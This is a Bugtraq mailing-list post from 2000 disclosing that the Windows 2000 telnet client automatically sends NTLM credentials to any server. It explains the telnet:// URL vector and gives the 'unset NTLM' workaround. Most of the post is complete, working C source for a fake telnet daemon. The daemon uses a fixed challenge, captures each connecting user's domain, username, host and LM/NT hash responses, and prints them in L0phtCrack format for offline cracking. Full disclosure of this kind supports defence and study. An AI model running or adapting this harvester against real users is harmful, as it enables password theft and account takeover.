Home page logo
/

bugtraq logo Bugtraq mailing list archives

Win2k Telnet.exe malicious server vulnerability
From: monti <monti () USHOST COM>
Date: Wed, 13 Sep 2000 15:13:29 -0500


Microsoft was informed of this problem (with exploit) over a month ago. I
received some token responses right after emailing them, but have heard
nothing since. If they have released an advisory of their own yet, I have
not seen it. I informed them up-front that I would release a
full-disclosure advisory of my own in 3 weeks time. They have had much
more than that to take action.


Problem:
========

Windows 2000's telnet client 'telnet.exe'  supports performing NTLM
authentication using the credentials of the logged in user. If it connects
to an NTLM enabled telnet server (i.e. a Win2k server with the MS provided
telnet service) it will automatically attempt to log in with the users
credientials without prompting them for any information.

The NTLM challenge/response protocol as others have shown, is vulnerable
to brute-force cracking. L0phtCrack, with it's "sniffed NT hash cracking"
capabilities is an excellent implementation.

This behavior is seen consistently in other Microsoft written clients. IE,
Netbios Workstation (i.e. windows itself over netbios), and probably
others have and/or do automatically authenticate the user with NTLM
(and sometimes other even worse schemes) without prompting them.

NTLM challenge/response is *NOT* an iron authentication scheme, MS! Stop
trusting it so much!


Vulnerability/Exploit Description:
==================================

In short, if you can get the user or his/her machine to telnet to you with
telnet.exe, you can get ahold of enough information to
perform a brute-force/dictionary crack on their password (and find our
their Domain if they are logged into one). Even if you arent going to
crack their password, you can get entirely too much information IMO.

During my tests I discovered that IE associates the telnet:// URL with the
vulnerable telnet.exe. This opens up several possible ways to force a user
into connecting to you with a malicious HTLM web page, email message, and
so on. I would speculate that it might also be possible to force this to
happen without user intervention with javascript/activeX/java or really
creative HTLM. I try really hard not to do HTLM/web-code anymore unless
it's really necessary so I didnt test this.

Also, since NTLM relies on the server "randomly generating" an 8-byte
challenge for the authentication, we can choose our own with the code
provided and use it to pre-compute a database of encrypted passwords to
avoid even having to crack them. Also attached is a really ugly bit of
code I hobbled together a while back that can be used to do this.

Please see the exploit for technical details. I hope the ntlm structures
and functions will be useful to others in the future on their own Windows
nt/2000 projects. I have used roughly the same routines for IIS/IE-ntlm
HTTP Auth code on Unix. Please note, this code will only work on intel or
other little-endian systems right now... I didnt get any architecture
dependent byte-order logic worked in yet.


Workaround/Fix:
===============

The NTLM functionality in telnet.exe is optional, but it is enabled by
default on all W2000 installations i've seen.

To turn of NTLM in telnet, just run 'telnet.exe' without arguments which
will get you into a cli for setting/unsetting variables and so on. Then
type 'unset NTLM'. This will disable all NTLM functionality in the client,
so... if for some really ill-advised reason you want or need this
function, you're out of luck unless Microsoft comes up with something
better.


Credits:
========

I should mention that I heard at DefCON that cDc/Newhackcity had
discovered and discussed this vulnerability during one of their
presentations that I missed. I did not colaborate with them on this and
had run across it myself before vegas, but Microsoft informed me that they
had also been contacted by cDc with the same bug.
I havent seen any material from them published yet though, so as far as I
know this is the first full public disclosure.


Other credits and thanks:

DMZ, Changeling, Brent, and Nate... thanks for your help testing and
playing with this in vegas.

Ronald Tschalar for his paper at:
http://www.innovation.ch/java/ntlm.html.
As you can see in my code, I definitely made use of some of his ideas.

Paul Ashton published an material based on this same stupid behavior in IE
3.0/4.0 back in 96/97 or so and his advisories helped get me thinking
about NTLM games to play in all the new protocols it's been implemented
in.
A copy of his advisory is at:
http://www.insecure.org/sploits/winnt.automatic.authentication.html


Author:
=======

Yeza (9/2000)
/* NTLM telnetD v0.8

   Snarfs NTLM challenge/response by convincing w2k telnet client to
   auto-authenticate. 
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld

   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!

   proof-of-concept version. more features to be added.

   by yeza (8/2000)
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define LISTEN_PORT 23
#define LISTENADDR "0.0.0.0"
#define VERBOSE 0            // 1 for verbose
#define CHALLENGE "\xde\xad\xbe\xef\xde\xad\xbe\xef"

#define MAXBUF 2048

/* Below are hardcoded telnet negotiation values.
   These are based on packet sniffs and as little decoding as possible.
   I'm lazy and this isnt really a telnet server so why muck with telnet.h?
*/

static unsigned char *srv_neg1 =
  "\xff\xfd\x25\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x00\xff\xfb\x00";
static unsigned int srv_neg1_sz = 18;

static unsigned char *srv_neg2 = 
  "\xff\xfa\x25\x01\x0f\x00\xff\xf0";
static unsigned int srv_neg2_sz = 8;


/* Below is the hardcoded NTLM challenge.
   Change the 8-byte challenge above if you dont like the smell of 'deadbeef'
   Change the hostname if desired -- but keep tabs on hostname len, telnet hdr
   size and 'srv_fake_NTLM_challenge_sz' if you do.
*/
static unsigned char *srv_fake_NTLM_challenge =
  "\xff\xfa\x25\x02\x0f\x00\x01" /* telnet auth head                        */
  "\x38\x00\x00\x00"             /* Size of challenge token                 */
  "\x02\x00\x00\x00"             /* L int = 2 ?unknown?                     */
  "NTLMSSP\x00"                      /* Token header            START TOKEN */
  "\x02\x00\x00\x00"                 /* NTLM sequence = 2                   */
  "\x08\x00\x08\x00"                 /* hostname len (twice)                */
  "\x30\x00\x00\x00"                 /* hostname offset                     */
  "\x05\x82\x02\x00"                 /* 4-byte flags                        */
  CHALLENGE                          /* 8-byte challenge                    */
  "\x00\x00\x00\x00\x00\x00\x00\x00" /* unused                              */
  "\x00\x00\x00\x00"                 /* unused len                          */
  "\x38\x00\x00\x00"                 /* unused offset                       */
  "D\x00O\x00I\x00T\x00"             /* hostname "DOIT"(u-code)   END TOKEN */
  "\xff\xf0"                     /* telnet auth tail                        */
  ;
static unsigned int srv_fake_NTLM_challenge_sz = 73;


int printhexdump (unsigned char *buf, int len) 
{
     int i;
     for(i=0; i < len; i++) {
         fprintf (stderr, "%02x ", buf[i]);
     }
     fprintf (stderr, "\n");
     return (i);
}

void 
cphex (unsigned char *dest, unsigned char *src, unsigned int dlen)
{
    int i;
    for (i=0; i < dlen; i+=2)
    {
        snprintf ((char *)(dest+i), 3,"%02x", src[(i/2)]); 
    }

}

void dropconn (int sock) {
     close(sock);
     fprintf(stderr, "\nConnection Closed\n");
}

/* Structure to hold snarfed auth. information */
struct client_info {
    unsigned char user[128];
    unsigned char dom[128];
    unsigned char host[128];
    unsigned char ipaddr[16];
    unsigned char chal[17];
    unsigned char lmh[49];
    unsigned char nth[49];
} cli_info;


/* NTLM TOKEN HEADERS */

/* Request token header structure  */
/* 32 bytes for this header */
struct reqtoken
{
    unsigned char       protocol[8];     // "NTLMSSP\0"
    unsigned int        type;            // 1
    unsigned char       flags[4];        // NTLM flags
    unsigned short      dlen,dlen2;      // Domain length
    unsigned int        dpos;            // Domain position
    unsigned short      hlen,hlen2;      // Hostname length
    unsigned int        hpos;            // Hostname position
    //          unicode domain   (variable length)
    //          unicode hostname (variable length)
};

/* Challenge token header structure */
/* 48 bytes for this header  */
struct chaltoken
{
    unsigned char       protocol[8];     // "NTLMSSP\0"
    unsigned int        type;            // 2
    unsigned short      hlen,hlen2;      // Hostname length
    unsigned int        hpos;            // Hostname position
    unsigned char       flags[4];        // NTLM flags
    unsigned char       chal[8];         // 8-byte NTLM Challenge
    unsigned short      nl,nl2;          // unused length
    unsigned int        np;              // unused position
    unsigned short      tl,tl2;          // unknown, possibly unused
    unsigned int        tlen;            // Total length of token.
    //          unicode hostname (variable length)
    //          unused string... does appear to be used by w2k telnetd
};


/* Response token header structure */
/* 64 bytes for this header */
struct resptoken
{
    unsigned char       protocol[8];     // "NTLMSSP\0"
    unsigned int        type;            // 3
    unsigned short      lmrlen,lmrlen2;  // LM hash response length (24 always)
    unsigned int        lmrpos;          // LM hash response position
    unsigned short      ntrlen,ntrlen2;  // NT hash response length (24 always)
    unsigned int        ntrpos;          // NT hash response position
    unsigned short      dlen,dlen2;      // Domain length
    unsigned int        dpos;            // Domain position
    unsigned short      ulen,ulen2;      // Username length
    unsigned int        upos;            // Username position
    unsigned short      hlen,hlen2;      // Hostname length
    unsigned int        hpos;            // Hostname position
    unsigned short      tl,tl2;          // unknown, presumably unused
    unsigned int        tlen;            // Total length of token
    unsigned char       flags[4];        // NTLM flags
    //          unicode domain   (variable length)
    //          unicode user     (variable length)
    //          unicode hostname (variable length)
    //          lm hash response (24-bytes)
    //          nt hash response (24-bytes)

};


/* Stupid little Unicode helper */
int
lame_ucode(unsigned char *dst, unsigned char *src, int len)
{
    int i;
    for(i=0;i<len;i++){
        *(dst++) = src[i];
        *(dst++) = '\0';
    }
    return (i);
}

/* Stupid little de-Unicode helper */
int
lame_deucode(unsigned char *dst, unsigned char *src, int len, int maxlen)
{
    int i;

    len--;

    if (maxlen < (len)) len=maxlen;

    for(i=0;i<len;i++){
        if (src[i] != '\0')
            *(dst++) = src[i];
    }
    *(dst++) = '\0'; /* Throw in -1- null... ! () #$AT THE END! () #$ */
    return(strlen(dst));
}    


void
get_resptoken(unsigned char *src, unsigned int len)
{
    struct resptoken *rp = (struct resptoken *) src;

    lame_deucode(cli_info.user, (unsigned char *) rp+rp->upos, 
                 rp->ulen, sizeof(cli_info.user));
    lame_deucode(cli_info.host, (unsigned char *) rp+rp->hpos, 
                 rp->hlen, sizeof(cli_info.host));
    lame_deucode(cli_info.dom, (unsigned char *) rp+rp->dpos, 
                 rp->dlen, sizeof(cli_info.dom));
    cphex(cli_info.lmh, (unsigned char*) rp+rp->lmrpos, 48);
    cphex(cli_info.nth, (unsigned char*) rp+rp->ntrpos, 48);

}

/* gettoken

   Check 'len' bytes from 'src' as an NTLM token 
   fork get_resptoken depending on type.
   Returns 0 if everything looks good.
*/
int
gettoken (unsigned char *src, unsigned int len)
{
    struct chaltoken *srctk = (struct chaltoken *) src;
    unsigned int type = *(src+8);

    /* check protocol */
    if ((strncmp(src, "NTLMSSP\0", 8)) || (type > 3))
         return (-1);

    if(type == 1) 
    {
        fprintf(stderr, "Got NTLM request token\n");
        return(0);
    }
    else if(type == 3)
    {
        if(len > (sizeof(struct resptoken)) + 48) {
            fprintf(stderr, "Got NTLM response token\n");
            get_resptoken(src,len);
        } else {
            return(-1);
        }

    } else {
        fprintf(stderr, "Type 2 not handled\n");
        return(-1);
    }

    return(0);
}

void
usage(unsigned char *progname) {
     fprintf(stderr, 
             "Usage: %s [options]\n", progname);
     fprintf(stderr,
             "           -v        verbose\n"
             "           -l port   listen on 'port'\n"
             "           -h        help\n");

     exit(1);
}

int
main(int argc, char **argv)
{
     struct sockaddr_in server, client;
     unsigned int lsock, o; 
     unsigned int port = LISTEN_PORT;
     unsigned int verbose = VERBOSE;
     ssize_t rlen, ctklen;
     unsigned char rbuf[MAXBUF];
     unsigned char ntlm_challenge[8] = CHALLENGE;

     cphex(cli_info.chal, ntlm_challenge, 16);

     fprintf(stderr,"[ Fake NTLM Telnet Daemon - by yeza ]\n");

     while ((o = getopt(argc, argv, "vl:h")) != -1) {
         switch(o) {
           case 'v':
                   ++verbose;
                   break;
           case 'l':
                   if(optarg) {
                       port = atoi(optarg);
                       break;
                   } else {
                       usage(argv[0]);
                   }
           case 'h':
                   usage(argv[0]);
         }
     }


     lsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
     if (lsock < 0) {
         fprintf(stderr, "Cannot create listening socket: %m\n");
         exit(1);
     }

     server.sin_family = AF_INET;
     server.sin_addr.s_addr = inet_addr(LISTENADDR);
     server.sin_port = htons(port);

     if (bind(lsock, (struct sockaddr *) &server, sizeof(server)) < 0) {
         fprintf(stderr, "Cannot bind socket: %m\n");
         close(lsock);
         exit(1);
     }

     listen(lsock, 200);

     fprintf(stderr, "Listening on port %d\n", ntohs(server.sin_port));
     fprintf(stderr, "Awaiting connections\n\n");

     while (1) {
         int csock, cl_addrlen;
         unsigned int reqlen, resplen;

         if((csock = accept(lsock, 0, 0)) < 0) {
             fprintf(stderr, "Cannot accept socket: %m\n");
             continue;
         }

         cl_addrlen = sizeof(client);

         if(getpeername(csock, &client, &cl_addrlen) < 0) {
             fprintf(stderr, "Cannot get peer name of remote host: %m\n");
             dropconn(csock);
             continue;
         }

         fprintf(stderr, "Connection from: %s\n", 
                (char *) inet_ntoa(client.sin_addr.s_addr));

         strncpy(cli_info.ipaddr,(char *)inet_ntoa(client.sin_addr.s_addr), 15);

         /* ============ This begins our telnet auth handshake ===============*/

         /* server sends: (srv_neg1)
            DO AUTHENTICATION, WILL ECHO, DO SUPPRESS GO AHEAD, DO NAWS, 
            DO BINARY, WILL BINARY
          */
         send(csock, (char *) srv_neg1, srv_neg1_sz, 0);


         /* client sends back: 
            WILL AUTHENTICATION
          */
         rlen = recv(csock, (char *) rbuf, MAXBUF, 0);

         if(verbose>0){
             fprintf(stderr, "\n%d byte response to neg1 =\n", rlen );
             printhexdump(rbuf, rlen);
         }

         if(strncmp(rbuf, "\xff\xfb\x25", 3) != 0) { //just check first 3 bytes
             fprintf(stderr, "Wrong telnet neg1 response from client\n");
             dropconn(csock);
             continue;
         }
         memset(rbuf, '\0', MAXBUF);rlen=0;


         /* server sends: (srv_neg2)
            SB AUTHENTICATION SEND ... SE
           */
         send(csock, (char *) srv_neg2, srv_neg2_sz, 0);


         rlen = recv(csock, (char *) rbuf, MAXBUF, 0);
         if(verbose>0) {
             fprintf(stderr, "\n%d byte response to neg2 =\n", rlen );
             printhexdump(rbuf, rlen);
         }

         if(strncmp(rbuf, "\xff\xfd", 2) != 0) {
             fprintf(stderr, "Wrong telnet neg2 response from client\n");
             dropconn(csock);
             continue;
         }
         memset(rbuf, '\0', MAXBUF); rlen=0;


         /* Receive what should be the NTLM Request Token */

         rlen = recv(csock, (char *) rbuf, MAXBUF, 0);

         if(verbose>0) {
             fprintf(stderr, "\nReceived %d byte request token =\n", rlen );
             printhexdump(rbuf, rlen);
         }
         if(gettoken( rbuf+15, *(rbuf+7)) != 0) {
             fprintf(stderr, "Doesnt look like a NTLM request token.\n");
             dropconn(csock);
             continue;
         }
         memset(rbuf, '\0', MAXBUF);rlen=0;


         /* Send NTLM Challenge Token */
         fprintf (stderr, "Sending NTLM challenge token\n");
         if(verbose>0) {
             printhexdump(srv_fake_NTLM_challenge, srv_fake_NTLM_challenge_sz);
         }

         send(csock, (char *) srv_fake_NTLM_challenge, 
                     srv_fake_NTLM_challenge_sz, 
                     0);


         /* Receive what should be the NTLM Response Token */
         rlen = recv(csock, (char *) rbuf, MAXBUF, 0);

         if(verbose>0) {
             fprintf(stderr, "\n%d byte response to challenge=\n", rlen );
             printhexdump(rbuf, rlen);
             fprintf(stderr, "\n");
         }
         if(gettoken(rbuf+15, *(rbuf+7)) != 0) {
             fprintf(stderr, "Doesnt look like a NTLM request token.\n");
             dropconn(csock);
             continue;
         }

         memset(rbuf, '\0', MAXBUF);rlen=0;


         /* Were done with this victim */
         dropconn(csock);

         fprintf(stdout, "%s\\%s () %s/%s:3:%s:%s:%s\n",
                         cli_info.dom,
                         cli_info.user,
                         cli_info.ipaddr,
                         cli_info.host,
                         cli_info.chal,
                         cli_info.lmh,
                         cli_info.nth);
         fflush(stdout);
     }

     
     close(lsock);
     return(0);
}


Attachment: prehash.tgz
Description:


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]